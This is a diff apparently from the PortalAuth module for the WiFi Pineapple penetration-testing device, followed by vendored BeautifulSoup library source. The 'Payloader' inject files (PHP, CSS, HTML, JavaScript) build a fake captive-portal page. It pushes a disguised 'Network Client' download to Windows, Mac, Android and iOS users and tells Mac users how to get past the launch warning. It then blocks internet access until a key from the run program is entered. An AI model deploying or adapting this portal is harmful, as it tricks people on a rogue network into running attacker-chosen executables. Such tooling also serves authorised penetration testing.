/* v DO NOT MODIFY v */
|
||||
/*==================*/
|
||||
|
||||
$exe = "<EXE>";
|
||||
$app = "<APP>";
|
||||
$apk = "<APK>";
|
||||
$ipa = "<IPA>";
|
||||
|
||||
/*==================*/
|
||||
/* ^ DO NOT MODIFY ^ */
|
||||
/*==================*/
|
||||
|
||||
$base = "/download/";
|
||||
$exePath = $base . "windows/";
|
||||
$appPath = $base . "osx/";
|
||||
$apkPath = $base . "android/";
|
||||
$ipaPath = $base . "ios/";
|
||||
|
||||
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
|
||||
|
||||
/*
|
||||
This script checks the entered access key with the user's access key to either allow or deny them access.
|
||||
The key is held in a file that has the name of the user's IP address with all periods replaced with underscores
|
||||
in the $keyDir directory. The contents of the file are read in and compared with the supplied access key
|
||||
and either True or False are echoed back to the script in InjectJS.
|
||||
*/
|
||||
header('Access-Control-Allow-Origin: *');
|
||||
if (isset($_POST['verifyAccessKey'])) {
|
||||
|
||||
// Setup variables with the location of the key files
|
||||
$keyDir = "/pineapple/modules/PortalAuth/includes/pass/keys/";
|
||||
$keyFile = $keyDir . str_replace(".", "_", $_SERVER['REMOTE_ADDR']) . ".txt";
|
||||
|
||||
// Open the key file associated with the current client and read the value
|
||||
$accessKey = file_get_contents($keyFile);
|
||||
|
||||
// Check if the access key provided by the client matches the one from the file
|
||||
if ($_POST['verifyAccessKey'] == $accessKey) {
|
||||
echo True;
|
||||
} else {
|
||||
echo False;
|
||||
}
|
||||
kill();
|
||||
}
|
||||
|
||||
?>
|
||||
90
PortalAuth/includes/scripts/injects/Payloader/injectCSS.txt
Executable file
90
PortalAuth/includes/scripts/injects/Payloader/injectCSS.txt
Executable file
@@ -0,0 +1,90 @@
|
||||
<style>
|
||||
.pa_field {
|
||||
width: 70%;
|
||||
height: 30px;
|
||||
font-size: 18px;
|
||||
border: 1px solid black;
|
||||
}
|
||||
.pa_main {
|
||||
background-color: rgba(255,255,255,.9);
|
||||
left: 0%;
|
||||
margin-top: 200px;
|
||||
text-align: center;
|
||||
padding-top: 75px;
|
||||
position: fixed;
|
||||
border-style:solid;
|
||||
border-width:medium;
|
||||
border-color:#aaa;
|
||||
-webkit-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
-moz-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
|
||||
}
|
||||
.pa_h1 {margin: auto; font: 36px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h2 {margin: auto; font: 26px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h3 {margin: auto; font: 22px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
.pa_h4 {margin: auto; font: 16px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
|
||||
#pa_akp {
|
||||
top: 50%;
|
||||
left: 50%;
|
||||
width: 600px;
|
||||
height: 340px;
|
||||
padding: 20px;
|
||||
margin-top: -200px;
|
||||
margin-left: -330px;
|
||||
z-index: 15;
|
||||
display: none;
|
||||
}
|
||||
#pa_overlay-back {
|
||||
position: fixed;
|
||||
top: 0;
|
||||
left: 0;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
background-color: rgba(0,0,0,.7);
|
||||
z-index: 5;
|
||||
display: none;
|
||||
}
|
||||
.pa_connectButton {
|
||||
-moz-box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
-webkit-box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
box-shadow:inset 0px 1px 3px 0px #3dc21b;
|
||||
background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #1fd950), color-stop(1, #5cbf2a));
|
||||
background:-moz-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-webkit-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-o-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:-ms-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
|
||||
background:linear-gradient(to bottom, #1fd950 5%, #5cbf2a 100%);
|
||||
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#1fd950', endColorstr='#5cbf2a',GradientType=0);
|
||||
background-color:#1fd950;
|
||||
-moz-border-radius:5px;
|
||||
-webkit-border-radius:5px;
|
||||
border-radius:5px;
|
||||
border:1px solid #18ab29;
|
||||
display:inline-block;
|
||||
cursor:pointer;
|
||||
color:#ffffff;
|
||||
font-family:arial;
|
||||
font-size:22px;
|
||||
font-weight:bold;
|
||||
padding:12px 37px;
|
||||
text-decoration:none;
|
||||
text-shadow:0px -1px 0px #2f6627;
|
||||
}
|
||||
.pa_connectButton:hover {
|
||||
background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5cbf2a), color-stop(1, #1fd950));
|
||||
background:-moz-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-webkit-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-o-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:-ms-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
|
||||
background:linear-gradient(to bottom, #5cbf2a 5%, #1fd950 100%);
|
||||
filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#5cbf2a', endColorstr='#1fd950',GradientType=0);
|
||||
background-color:#5cbf2a;
|
||||
}
|
||||
.pa_connectButton:active {
|
||||
position:relative;
|
||||
top:1px;
|
||||
}
|
||||
.pa_left {
|
||||
margin-left: 60px;
|
||||
}
|
||||
</style>
|
||||
14
PortalAuth/includes/scripts/injects/Payloader/injectHTML.txt
Executable file
14
PortalAuth/includes/scripts/injects/Payloader/injectHTML.txt
Executable file
@@ -0,0 +1,14 @@
|
||||
<div id="pa_overlay-back"></div>
|
||||
<div id='pa_akp' class='pa_main'>
|
||||
<h1 class="pa_h1">Network Client Download</h1><br />
|
||||
<h4 class="pa_h4">To access our WiFi please download and use our free network client software.
|
||||
When you run the program an <strong>access key</strong> will be generated which will need to be entered below
|
||||
in order to start surfing the internet.</h4>
|
||||
<br />
|
||||
<a id="pa_NetClientURL" href=""><h3 class='pa_h3'>Download Network Client</h3></a>
|
||||
<br />
|
||||
<span id='pa_macnotice' style='font-size: 80%;'><br /></span>
|
||||
<input type='text' id='pa_accessKey' class='pa_field' placeholder='Access Key' />
|
||||
<br /><br />
|
||||
<button id="submit_button" class="pa_connectButton" type="button">Submit</button>
|
||||
</div>
|
||||
70
PortalAuth/includes/scripts/injects/Payloader/injectJS.txt
Executable file
70
PortalAuth/includes/scripts/injects/Payloader/injectJS.txt
Executable file
@@ -0,0 +1,70 @@
|
||||
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>
|
||||
|
||||
<script>
|
||||
window.onload = setTimeout(displayAccessKeyPanel, 1000);
|
||||
|
||||
$(function() {
|
||||
if (navigator.appVersion.indexOf("Win") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $exePath . $exe . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("Mac") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $appPath . $app . "');";
|
||||
?>
|
||||
$('#pa_macnotice').html("*NOTE: To run the network client on your Mac you need to hold down the control button, click the app, then click open.");
|
||||
} else if (navigator.appVersion.indexOf("Android") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $apkPath . $apk . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPhone") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPad") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPod") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
}
|
||||
|
||||
$('#submit_button').on('click',function(){
|
||||
if ($('#pa_accessKey').val() == "") {
|
||||
alert("Please enter the access key given by the network client software.");
|
||||
return;
|
||||
}
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/index.php",
|
||||
data: {verifyAccessKey: $('#pa_accessKey').val()},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqXHR) {
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/captiveportal/index.php",
|
||||
data: {target: "<?=$destination?>"},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqHXR) {
|
||||
window.location="/captiveportal/index.php";
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
window.location="/captiveportal/index.php";
|
||||
}
|
||||
});
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
alert("Invalid access key");
|
||||
}
|
||||
});
|
||||
});
|
||||
});
|
||||
function displayAccessKeyPanel(){
|
||||
$(function(){
|
||||
$('#pa_akp').css('opacity','1');
|
||||
$('#pa_akp,#pa_overlay-back').fadeIn('slow');
|
||||
});
|
||||
}
|
||||
</script>
|
||||
49
PortalAuth/includes/scripts/injects/Payloader/injectPHP.txt
Executable file
49
PortalAuth/includes/scripts/injects/Payloader/injectPHP.txt
Executable file
@@ -0,0 +1,49 @@
|
||||
<?php
|
||||
|
||||
/*==================*/
|
||||
/* v DO NOT MODIFY v */
|
||||
/*==================*/
|
||||
|
||||
$exe = "<EXE>";
|
||||
$app = "<APP>";
|
||||
$apk = "<APK>";
|
||||
$ipa = "<IPA>";
|
||||
|
||||
/*==================*/
|
||||
/* ^ DO NOT MODIFY ^ */
|
||||
/*==================*/
|
||||
|
||||
$base = "/download/";
|
||||
$exePath = $base . "windows/";
|
||||
$appPath = $base . "osx/";
|
||||
$apkPath = $base . "android/";
|
||||
$ipaPath = $base . "ios/";
|
||||
|
||||
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
|
||||
|
||||
/*
|
||||
This script checks the entered access key with the user's access key to either allow or deny them access.
|
||||
The key is held in a file that has the name of the user's IP address with all periods replaced with underscores
|
||||
in the $keyDir directory. The contents of the file are read in and compared with the supplied access key
|
||||
and either True or False are echoed back to the script in InjectJS.
|
||||
*/
|
||||
header('Access-Control-Allow-Origin: *');
|
||||
if (isset($_POST['verifyAccessKey'])) {
|
||||
|
||||
// Setup variables with the location of the key files
|
||||
$keyDir = "/pineapple/modules/PortalAuth/includes/pass/keys/";
|
||||
$keyFile = $keyDir . str_replace(".", "_", $_SERVER['REMOTE_ADDR']) . ".txt";
|
||||
|
||||
// Open the key file associated with the current client and read the value
|
||||
$accessKey = file_get_contents($keyFile);
|
||||
|
||||
// Check if the access key provided by the client matches the one from the file
|
||||
if ($_POST['verifyAccessKey'] == $accessKey) {
|
||||
echo True;
|
||||
} else {
|
||||
echo False;
|
||||
}
|
||||
kill();
|
||||
}
|
||||
|
||||
?>
|
||||
4
PortalAuth/includes/scripts/jquery-2.2.1.min.js
vendored
Executable file
4
PortalAuth/includes/scripts/jquery-2.2.1.min.js
vendored
Executable file
File diff suppressed because one or more lines are too long
21
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/PKG-INFO
Executable file
21
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/PKG-INFO
Executable file
@@ -0,0 +1,21 @@
|
||||
Metadata-Version: 1.1
|
||||
Name: beautifulsoup4
|
||||
Version: 4.4.0
|
||||
Summary: Screen-scraping library
|
||||
Home-page: http://www.crummy.com/software/BeautifulSoup/bs4/
|
||||
Author: Leonard Richardson
|
||||
Author-email: leonardr@segfault.org
|
||||
License: MIT
|
||||
Download-URL: http://www.crummy.com/software/BeautifulSoup/bs4/download/
|
||||
Description: Beautiful Soup sits atop an HTML or XML parser, providing Pythonic idioms for iterating, searching, and modifying the parse tree.
|
||||
Platform: UNKNOWN
|
||||
Classifier: Development Status :: 5 - Production/Stable
|
||||
Classifier: Intended Audience :: Developers
|
||||
Classifier: License :: OSI Approved :: MIT License
|
||||
Classifier: Programming Language :: Python
|
||||
Classifier: Programming Language :: Python :: 2
|
||||
Classifier: Programming Language :: Python :: 3
|
||||
Classifier: Topic :: Text Processing :: Markup :: HTML
|
||||
Classifier: Topic :: Text Processing :: Markup :: XML
|
||||
Classifier: Topic :: Text Processing :: Markup :: SGML
|
||||
Classifier: Topic :: Software Development :: Libraries :: Python Modules
|
||||
40
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/SOURCES.txt
Executable file
40
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/SOURCES.txt
Executable file
@@ -0,0 +1,40 @@
|
||||
AUTHORS.txt
|
||||
COPYING.txt
|
||||
MANIFEST.in
|
||||
NEWS.txt
|
||||
README.txt
|
||||
TODO.txt
|
||||
convert-py3k
|
||||
setup.cfg
|
||||
setup.py
|
||||
test-all-versions
|
||||
beautifulsoup4.egg-info/PKG-INFO
|
||||
beautifulsoup4.egg-info/SOURCES.txt
|
||||
beautifulsoup4.egg-info/dependency_links.txt
|
||||
beautifulsoup4.egg-info/requires.txt
|
||||
beautifulsoup4.egg-info/top_level.txt
|
||||
bs4/__init__.py
|
||||
bs4/dammit.py
|
||||
bs4/diagnose.py
|
||||
bs4/element.py
|
||||
bs4/testing.py
|
||||
bs4/builder/__init__.py
|
||||
bs4/builder/_html5lib.py
|
||||
bs4/builder/_htmlparser.py
|
||||
bs4/builder/_lxml.py
|
||||
bs4/tests/__init__.py
|
||||
bs4/tests/test_builder_registry.py
|
||||
bs4/tests/test_docs.py
|
||||
bs4/tests/test_html5lib.py
|
||||
bs4/tests/test_htmlparser.py
|
||||
bs4/tests/test_lxml.py
|
||||
bs4/tests/test_soup.py
|
||||
bs4/tests/test_tree.py
|
||||
doc/Makefile
|
||||
doc.zh/Makefile
|
||||
doc.zh/source/conf.py
|
||||
doc/source/6.1.jpg
|
||||
doc/source/conf.py
|
||||
doc/source/index.rst
|
||||
scripts/demonstrate_parser_differences.py
|
||||
scripts/demonstration_markup.txt
|
||||
@@ -0,0 +1 @@
|
||||
|
||||
7
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/requires.txt
Executable file
7
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/requires.txt
Executable file
@@ -0,0 +1,7 @@
|
||||
|
||||
|
||||
[lxml]
|
||||
lxml
|
||||
|
||||
[html5lib]
|
||||
html5lib
|
||||
1
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/top_level.txt
Executable file
1
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/top_level.txt
Executable file
@@ -0,0 +1 @@
|
||||
bs4
|
||||
468
PortalAuth/includes/scripts/libs/bs4/__init__.py
Executable file
468
PortalAuth/includes/scripts/libs/bs4/__init__.py
Executable file
@@ -0,0 +1,468 @@
|
||||
"""Beautiful Soup
|
||||
Elixir and Tonic
|
||||
"The Screen-Scraper's Friend"
|
||||
http://www.crummy.com/software/BeautifulSoup/
|
||||
|
||||
Beautiful Soup uses a pluggable XML or HTML parser to parse a
|
||||
(possibly invalid) document into a tree representation. Beautiful Soup
|
||||
provides provides methods and Pythonic idioms that make it easy to
|
||||
navigate, search, and modify the parse tree.
|
||||
|
||||
Beautiful Soup works with Python 2.6 and up. It works better if lxml
|
||||
and/or html5lib is installed.
|
||||
|
||||
For more than you ever wanted to know about Beautiful Soup, see the
|
||||
documentation:
|
||||
http://www.crummy.com/software/BeautifulSoup/bs4/doc/
|
||||
"""
|
||||
|
||||
__author__ = "Leonard Richardson (leonardr@segfault.org)"
|
||||
__version__ = "4.4.0"
|
||||
__copyright__ = "Copyright (c) 2004-2015 Leonard Richardson"
|
||||
__license__ = "MIT"
|
||||
|
||||
__all__ = ['BeautifulSoup']
|
||||
|
||||
import os
|
||||
import re
|
||||
import warnings
|
||||
|
||||
from .builder import builder_registry, ParserRejectedMarkup
|
||||
from .dammit import UnicodeDammit
|
||||
from .element import (
|
||||
CData,
|
||||
Comment,
|
||||
DEFAULT_OUTPUT_ENCODING,
|
||||
Declaration,
|
||||
Doctype,
|
||||
NavigableString,
|
||||
PageElement,
|
||||
ProcessingInstruction,
|
||||
ResultSet,
|
||||
SoupStrainer,
|
||||
Tag,
|
||||
)
|
||||
|
||||
# The very first thing we do is give a useful error if someone is
|
||||
# running this code under Python 3 without converting it.
|
||||
'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work.'<>'You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
|
||||
|
||||
class BeautifulSoup(Tag):
|
||||
"""
|
||||
This class defines the basic interface called by the tree builders.
|
||||
|
||||
These methods will be called by the parser:
|
||||
reset()
|
||||
feed(markup)
|
||||
|
||||
The tree builder may call these methods from its feed() implementation:
|
||||
handle_starttag(name, attrs) # See note about return value
|
||||
handle_endtag(name)
|
||||
handle_data(data) # Appends to the current data node
|
||||
endData(containerClass=NavigableString) # Ends the current data node
|
||||
|
||||
No matter how complicated the underlying parser is, you should be
|
||||
able to build a tree using 'start tag' events, 'end tag' events,
|
||||
'data' events, and "done with data" events.
|
||||
|
||||
If you encounter an empty-element tag (aka a self-closing tag,
|
||||
like HTML's <br> tag), call handle_starttag and then
|
||||
handle_endtag.
|
||||
"""
|
||||
ROOT_TAG_NAME = u'[document]'
|
||||
|
||||
# If the end-user gives no indication which tree builder they
|
||||
# want, look for one with these features.
|
||||
DEFAULT_BUILDER_FEATURES = ['html', 'fast']
|
||||
|
||||
ASCII_SPACES = '\x20\x0a\x09\x0c\x0d'
|
||||
|
||||
NO_PARSER_SPECIFIED_WARNING = "No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system (\"%(parser)s\"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.\n\nTo get rid of this warning, change this:\n\n BeautifulSoup([your markup])\n\nto this:\n\n BeautifulSoup([your markup], \"%(parser)s\")\n"
|
||||
|
||||
def __init__(self, markup="", features=None, builder=None,
|
||||
parse_only=None, from_encoding=None, exclude_encodings=None,
|
||||
**kwargs):
|
||||
"""The Soup object is initialized as the 'root tag', and the
|
||||
provided markup (which can be a string or a file-like object)
|
||||
is fed into the underlying parser."""
|
||||
|
||||
if 'convertEntities' in kwargs:
|
||||
warnings.warn(
|
||||
"BS4 does not respect the convertEntities argument to the "
|
||||
"BeautifulSoup constructor. Entities are always converted "
|
||||
"to Unicode characters.")
|
||||
|
||||
if 'markupMassage' in kwargs:
|
||||
del kwargs['markupMassage']
|
||||
warnings.warn(
|
||||
"BS4 does not respect the markupMassage argument to the "
|
||||
"BeautifulSoup constructor. The tree builder is responsible "
|
||||
"for any necessary markup massage.")
|
||||
|
||||
if 'smartQuotesTo' in kwargs:
|
||||
del kwargs['smartQuotesTo']
|
||||
warnings.warn(
|
||||
"BS4 does not respect the smartQuotesTo argument to the "
|
||||
"BeautifulSoup constructor. Smart quotes are always converted "
|
||||
"to Unicode characters.")
|
||||
|
||||
if 'selfClosingTags' in kwargs:
|
||||
del kwargs['selfClosingTags']
|
||||
warnings.warn(
|
||||
"BS4 does not respect the selfClosingTags argument to the "
|
||||
"BeautifulSoup constructor. The tree builder is responsible "
|
||||
"for understanding self-closing tags.")
|
||||
|
||||
if 'isHTML' in kwargs:
|
||||
del kwargs['isHTML']
|
||||
warnings.warn(
|
||||
"BS4 does not respect the isHTML argument to the "
|
||||
"BeautifulSoup constructor. Suggest you use "
|
||||
"features='lxml' for HTML and features='lxml-xml' for "
|
||||
"XML.")
|
||||
|
||||
def deprecated_argument(old_name, new_name):
|
||||
if old_name in kwargs:
|
||||
warnings.warn(
|
||||
'The "%s" argument to the BeautifulSoup constructor '
|
||||
'has been renamed to "%s."' % (old_name, new_name))
|
||||
value = kwargs[old_name]
|
||||
del kwargs[old_name]
|
||||
return value
|
||||
return None
|
||||
|
||||
parse_only = parse_only or deprecated_argument(
|
||||
"parseOnlyThese", "parse_only")
|
||||
|
||||
from_encoding = from_encoding or deprecated_argument(
|
||||
"fromEncoding", "from_encoding")
|
||||
|
||||
if len(kwargs) > 0:
|
||||
arg = kwargs.keys().pop()
|
||||
raise TypeError(
|
||||
"__init__() got an unexpected keyword argument '%s'" % arg)
|
||||
|
||||
if builder is None:
|
||||
original_features = features
|
||||
if isinstance(features, basestring):
|
||||
features = [features]
|
||||
if features is None or len(features) == 0:
|
||||
features = self.DEFAULT_BUILDER_FEATURES
|
||||
builder_class = builder_registry.lookup(*features)
|
||||
if builder_class is None:
|
||||
raise FeatureNotFound(
|
||||
"Couldn't find a tree builder with the features you "
|
||||
"requested: %s. Do you need to install a parser library?"
|
||||
% ",".join(features))
|
||||
builder = builder_class()
|
||||
if not (original_features == builder.NAME or
|
||||
original_features in builder.ALTERNATE_NAMES):
|
||||
if builder.is_xml:
|
||||
markup_type = "XML"
|
||||
else:
|
||||
markup_type = "HTML"
|
||||
warnings.warn(self.NO_PARSER_SPECIFIED_WARNING % dict(
|
||||
parser=builder.NAME,
|
||||
markup_type=markup_type))
|
||||
|
||||
self.builder = builder
|
||||
self.is_xml = builder.is_xml
|
||||
self.builder.soup = self
|
||||
|
||||
self.parse_only = parse_only
|
||||
|
||||
if hasattr(markup, 'read'): # It's a file-type object.
|
||||
markup = markup.read()
|
||||
elif len(markup) <= 256:
|
||||
# Print out warnings for a couple beginner problems
|
||||
# involving passing non-markup to Beautiful Soup.
|
||||
# Beautiful Soup will still parse the input as markup,
|
||||
# just in case that's what the user really wants.
|
||||
if (isinstance(markup, unicode)
|
||||
and not os.path.supports_unicode_filenames):
|
||||
possible_filename = markup.encode("utf8")
|
||||
else:
|
||||
possible_filename = markup
|
||||
is_file = False
|
||||
try:
|
||||
is_file = os.path.exists(possible_filename)
|
||||
except Exception, e:
|
||||
# This is almost certainly a problem involving
|
||||
# characters not valid in filenames on this
|
||||
# system. Just let it go.
|
||||
pass
|
||||
if is_file:
|
||||
if isinstance(markup, unicode):
|
||||
markup = markup.encode("utf8")
|
||||
warnings.warn(
|
||||
'"%s" looks like a filename, not markup. You should probably open this file and pass the filehandle into Beautiful Soup.' % markup)
|
||||
if markup[:5] == "http:" or markup[:6] == "https:":
|
||||
# TODO: This is ugly but I couldn't get it to work in
|
||||
# Python 3 otherwise.
|
||||
if ((isinstance(markup, bytes) and not b' ' in markup)
|
||||
or (isinstance(markup, unicode) and not u' ' in markup)):
|
||||
if isinstance(markup, unicode):
|
||||
markup = markup.encode("utf8")
|
||||
warnings.warn(
|
||||
'"%s" looks like a URL. Beautiful Soup is not an HTTP client. You should probably use an HTTP client to get the document behind the URL, and feed that document to Beautiful Soup.' % markup)
|
||||
|
||||
for (self.markup, self.original_encoding, self.declared_html_encoding,
|
||||
self.contains_replacement_characters) in (
|
||||
self.builder.prepare_markup(
|
||||
markup, from_encoding, exclude_encodings=exclude_encodings)):
|
||||
self.reset()
|
||||
try:
|
||||
self._feed()
|
||||
break
|
||||
except ParserRejectedMarkup:
|
||||
pass
|
||||
|
||||
# Clear out the markup and remove the builder's circular
|
||||
# reference to this object.
|
||||
self.markup = None
|
||||
self.builder.soup = None
|
||||
|
||||
def __copy__(self):
|
||||
return type(self)(self.encode(), builder=self.builder)
|
||||
|
||||
def __getstate__(self):
|
||||
# Frequently a tree builder can't be pickled.
|
||||
d = dict(self.__dict__)
|
||||
if 'builder' in d and not self.builder.picklable:
|
||||
del d['builder']
|
||||
return d
|
||||
|
||||
def _feed(self):
|
||||
# Convert the document to Unicode.
|
||||
self.builder.reset()
|
||||
|
||||
self.builder.feed(self.markup)
|
||||
# Close out any unfinished strings and close all the open tags.
|
||||
self.endData()
|
||||
while self.currentTag.name != self.ROOT_TAG_NAME:
|
||||
self.popTag()
|
||||
|
||||
def reset(self):
|
||||
Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
|
||||
self.hidden = 1
|
||||
self.builder.reset()
|
||||
self.current_data = []
|
||||
self.currentTag = None
|
||||
self.tagStack = []
|
||||
self.preserve_whitespace_tag_stack = []
|
||||
self.pushTag(self)
|
||||
|
||||
def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
|
||||
"""Create a new tag associated with this soup."""
|
||||
return Tag(None, self.builder, name, namespace, nsprefix, attrs)
|
||||
|
||||
def new_string(self, s, subclass=NavigableString):
|
||||
"""Create a new NavigableString associated with this soup."""
|
||||
return subclass(s)
|
||||
|
||||
def insert_before(self, successor):
|
||||
raise NotImplementedError("BeautifulSoup objects don't support insert_before().")
|
||||
|
||||
def insert_after(self, successor):
|
||||
raise NotImplementedError("BeautifulSoup objects don't support insert_after().")
|
||||
|
||||
def popTag(self):
|
||||
tag = self.tagStack.pop()
|
||||
if self.preserve_whitespace_tag_stack and tag == self.preserve_whitespace_tag_stack[-1]:
|
||||
self.preserve_whitespace_tag_stack.pop()
|
||||
#print "Pop", tag.name
|
||||
if self.tagStack:
|
||||
self.currentTag = self.tagStack[-1]
|
||||
return self.currentTag
|
||||
|
||||
def pushTag(self, tag):
|
||||
#print "Push", tag.name
|
||||
if self.currentTag:
|
||||
self.currentTag.contents.append(tag)
|
||||
self.tagStack.append(tag)
|
||||
self.currentTag = self.tagStack[-1]
|
||||
if tag.name in self.builder.preserve_whitespace_tags:
|
||||
self.preserve_whitespace_tag_stack.append(tag)
|
||||
|
||||
def endData(self, containerClass=NavigableString):
|
||||
if self.current_data:
|
||||
current_data = u''.join(self.current_data)
|
||||
# If whitespace is not preserved, and this string contains
|
||||
# nothing but ASCII spaces, replace it with a single space
|
||||
# or newline.
|
||||
if not self.preserve_whitespace_tag_stack:
|
||||
strippable = True
|
||||
for i in current_data:
|
||||
if i not in self.ASCII_SPACES:
|
||||
strippable = False
|
||||
break
|
||||
if strippable:
|
||||
if '\n' in current_data:
|
||||
current_data = '\n'
|
||||
else:
|
||||
current_data = ' '
|
||||
|
||||
# Reset the data collector.
|
||||
self.current_data = []
|
||||
|
||||
# Should we add this string to the tree at all?
|
||||
if self.parse_only and len(self.tagStack) <= 1 and \
|
||||
(not self.parse_only.text or \
|
||||
not self.parse_only.search(current_data)):
|
||||
return
|
||||
|
||||
o = containerClass(current_data)
|
||||
self.object_was_parsed(o)
|
||||
|
||||
def object_was_parsed(self, o, parent=None, most_recent_element=None):
|
||||
"""Add an object to the parse tree."""
|
||||
parent = parent or self.currentTag
|
||||
previous_element = most_recent_element or self._most_recent_element
|
||||
|
||||
next_element = previous_sibling = next_sibling = None
|
||||
if isinstance(o, Tag):
|
||||
next_element = o.next_element
|
||||
next_sibling = o.next_sibling
|
||||
previous_sibling = o.previous_sibling
|
||||
if not previous_element:
|
||||
previous_element = o.previous_element
|
||||
|
||||
o.setup(parent, previous_element, next_element, previous_sibling, next_sibling)
|
||||
|
||||
self._most_recent_element = o
|
||||
parent.contents.append(o)
|
||||
|
||||
if parent.next_sibling:
|
||||
# This node is being inserted into an element that has
|
||||
# already been parsed. Deal with any dangling references.
|
||||
index = parent.contents.index(o)
|
||||
if index == 0:
|
||||
previous_element = parent
|
||||
previous_sibling = None
|
||||
else:
|
||||
previous_element = previous_sibling = parent.contents[index-1]
|
||||
if index == len(parent.contents)-1:
|
||||
next_element = parent.next_sibling
|
||||
next_sibling = None
|
||||
else:
|
||||
next_element = next_sibling = parent.contents[index+1]
|
||||
|
||||
o.previous_element = previous_element
|
||||
if previous_element:
|
||||
previous_element.next_element = o
|
||||
o.next_element = next_element
|
||||
if next_element:
|
||||
next_element.previous_element = o
|
||||
o.next_sibling = next_sibling
|
||||
if next_sibling:
|
||||
next_sibling.previous_sibling = o
|
||||
o.previous_sibling = previous_sibling
|
||||
if previous_sibling:
|
||||
previous_sibling.next_sibling = o
|
||||
|
||||
def _popToTag(self, name, nsprefix=None, inclusivePop=True):
|
||||
"""Pops the tag stack up to and including the most recent
|
||||
instance of the given tag. If inclusivePop is false, pops the tag
|
||||
stack up to but *not* including the most recent instqance of
|
||||
the given tag."""
|
||||
#print "Popping to %s" % name
|
||||
if name == self.ROOT_TAG_NAME:
|
||||
# The BeautifulSoup object itself can never be popped.
|
||||
return
|
||||
|
||||
most_recently_popped = None
|
||||
|
||||
stack_size = len(self.tagStack)
|
||||
for i in range(stack_size - 1, 0, -1):
|
||||
t = self.tagStack[i]
|
||||
if (name == t.name and nsprefix == t.prefix):
|
||||
if inclusivePop:
|
||||
most_recently_popped = self.popTag()
|
||||
break
|
||||
most_recently_popped = self.popTag()
|
||||
|
||||
return most_recently_popped
|
||||
|
||||
def handle_starttag(self, name, namespace, nsprefix, attrs):
|
||||
"""Push a start tag on to the stack.
|
||||
|
||||
If this method returns None, the tag was rejected by the
|
||||
SoupStrainer. You should proceed as if the tag had not occured
|
||||
in the document. For instance, if this was a self-closing tag,
|
||||
don't call handle_endtag.
|
||||
"""
|
||||
|
||||
# print "Start tag %s: %s" % (name, attrs)
|
||||
self.endData()
|
||||
|
||||
if (self.parse_only and len(self.tagStack) <= 1
|
||||
and (self.parse_only.text
|
||||
or not self.parse_only.search_tag(name, attrs))):
|
||||
return None
|
||||
|
||||
tag = Tag(self, self.builder, name, namespace, nsprefix, attrs,
|
||||
self.currentTag, self._most_recent_element)
|
||||
if tag is None:
|
||||
return tag
|
||||
if self._most_recent_element:
|
||||
self._most_recent_element.next_element = tag
|
||||
self._most_recent_element = tag
|
||||
self.pushTag(tag)
|
||||
return tag
|
||||
|
||||
def handle_endtag(self, name, nsprefix=None):
|
||||
#print "End tag: " + name
|
||||
self.endData()
|
||||
self._popToTag(name, nsprefix)
|
||||
|
||||
